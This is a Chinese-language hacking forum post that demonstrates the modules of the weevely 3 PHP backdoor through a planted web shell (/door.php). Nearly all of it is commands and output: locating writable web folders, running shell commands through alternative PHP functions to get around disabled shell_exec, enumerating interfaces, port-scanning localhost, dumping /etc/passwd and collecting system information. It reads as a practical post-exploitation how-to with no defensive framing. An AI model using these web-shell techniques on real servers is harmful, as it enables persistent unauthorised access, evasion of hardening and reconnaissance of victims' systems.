切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
232 PHP后门 weevely 3 模块[复制链接]
发表于 2012-8-26 19:50:02 | 显示全部楼层 |!read_mode!
寻找网站路径
  1. www-data@ubuntu:/var/www$ :find.webdir
  2. [find.webdir] Writable web folder: '/var/www/' -> 'http://5.5.5.4//'
  3. True
  4. www-data@ubuntu:/var/www$
复制代码
重点 运行命令
他提供这些函数 system, passthru, shell_exec, exec, pcntl_exec, popen, python_eval, perl->system, proc_open 一般服务器shell_exec是被禁止的 .. 更换函数运行
查看帮助
  1. www-data@ubuntu:/var/www$ :shell.sh
  2. [!] Error, required parameters: 'cmd'
  3. [!] Usage: <cmd> [stderr]
  4. cmd =                           Shell command   
  5. stderr = True                  Print standard error  Type: 'bool' (True, False)
  6. vector = system          Specify vector (system, passthru, shell_exec, exec, pcntl_exec, popen, python_eval, perl->system, proc_open)  
复制代码
我用PHP的popen函数运行
  1. www-data@ubuntu:/var/www$ :shell.sh cmd=id vector=popen
  2. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  3. www-data@ubuntu:/var/www$
复制代码
换一个 PYTHON的
  1. www-data@ubuntu:/var/www$ :shell.sh cmd=id vector=python_eval
  2. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  3. www-data@ubuntu:/var/www$
复制代码
寻找网卡


  1. www-data@ubuntu:/var/www$ :net.ifaces
  2. eth0: 5.5.5.4/24
  3. eth1: 10.0.3.15/24
  4. lo: 127.0.0.1/8
  5. www-data@ubuntu:/var/www$
复制代码
端口扫描
  1. www-data@ubuntu:/var/www$ :net.scan addr=127.0.0.1 port=1-10000
复制代码
返回
OPEN: 127.0.0.1:3306
读取信息文件
  1. www-data@ubuntu:/var/www$ :audit.etc_passwd
  2. root:x:0:0:root:/root:/bin/bash
  3. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  4. bin:x:2:2:bin:/bin:/bin/sh
  5. sys:x:3:3:sys:/dev:/bin/sh
  6. sync:x:4:65534:sync:/bin:/bin/sync
  7. games:x:5:60:games:/usr/games:/bin/sh
  8. man:x:6:12:man:/var/cache/man:/bin/sh
  9. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  10. mail:x:8:8:mail:/var/mail:/bin/sh
  11. news:x:9:9:news:/var/spool/news:/bin/sh
  12. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  13. proxy:x:13:13:proxy:/bin:/bin/sh
  14. www-data:x:33:33:www-data:/var/www:/bin/sh
  15. backup:x:34:34:backup:/var/backups:/bin/sh
  16. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  17. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  18. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. syslog:x:101:103::/home/syslog:/bin/false
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
  23. brk:x:1000:1000:brk,,,:/home/brk:/bin/bash
复制代码
系统信息
  1. www-data@ubuntu:/var/www$ :system.info
  2. whoami:                        www-data
  3. hostname:                ubuntu
  4. basedir:                /var/www
  5. uname:                        Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
  6. os:                        Linux
  7. document_root:                /var/www
  8. safe_mode:                0
  9. script:                        /door.php
  10. client_ip:                5.5.5.2
  11. max_execution_time:        30
  12. php_self:                /door.php
  13. www-data@ubuntu:/var/www$
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-29 21:18

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部